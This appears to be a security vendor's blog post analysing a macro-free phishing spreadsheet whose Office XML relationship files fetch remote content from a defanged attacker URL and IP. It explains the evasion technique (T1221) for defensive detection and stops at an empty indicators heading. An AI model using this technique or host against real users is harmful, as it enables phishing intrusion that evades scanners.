The Spreadsheet With No Macros and One Hidden Link: External Relationships in Office XML

An email from a construction company asked the recipient to review an attached spreadsheet. The signature block listed a contact name and address. SPF and DMARC passed via Microsoft 365. The attached .xlsx, 285 KB, returned a clean verdict from automated scanners.

The sending domain, murrellconstruction[.]com, has been registered since 2013 through GoDaddy. Whether the account was compromised or the attachment was planted through a forwarded thread is unclear. The file contained no VBA macros, no vbaProject.bin, and no embedded executable objects. By the criteria most secure email gateways apply to Office documents, this spreadsheet was clean.

It was not.

Inside the ZIP: What Scanners Missed

Every .xlsx file is a ZIP archive. Unzipping this one and reading the XML reveals what static analysis overlooked. Two relationship files, xl/_rels/workbook.xml.rels and xl/worksheets/_rels/sheet1.xml.rels, each contain an external Target URL pointing to hxxps://thesuccessformula[.]shop/sol/onetu/index[.]php. When a user opens the workbook, Excel's relationship engine resolves that URL and fetches remote content from the attacker-controlled domain.

The domain thesuccessformula[.]shop resolves to 152[.]228[.]223[.]226, returns HTTP 200, publishes DMARC p=none, and has no connection to the construction industry. Document metadata lists the creator as "user" with a creation timestamp of April 24, 2026. Two embedded images in the archive likely serve as visual decoys.

No macro-scanning policy would have caught this. The evasion is structural: a legitimate Office XML feature (T1221) repurposed as an external content fetch trigger.

See Your Risk: Calculate how many threats your SEG is missing

Why "No Macros" Is Not "No Risk"

Organizations that block or disable macros have closed one door. External relationships in Office XML files represent a different door entirely. The .rels file is a standard part of the Open XML specification. Scanners that check for vbaProject.bin and move on will never see a URL buried inside it.

Detection requires deep inspection of the ZIP archive structure or behavioral detection that evaluates what the document does when opened, not what it contains at rest. Community-driven threat intelligence accelerates recognition of these structural evasion patterns by correlating reports across organizations that have already encountered the technique.

The phone number and physical address in the email signature did not match public directory listings for the construction company. That is the kind of inconsistency a human reviewer might catch but an automated scanner will never evaluate.

Indicators of Compromise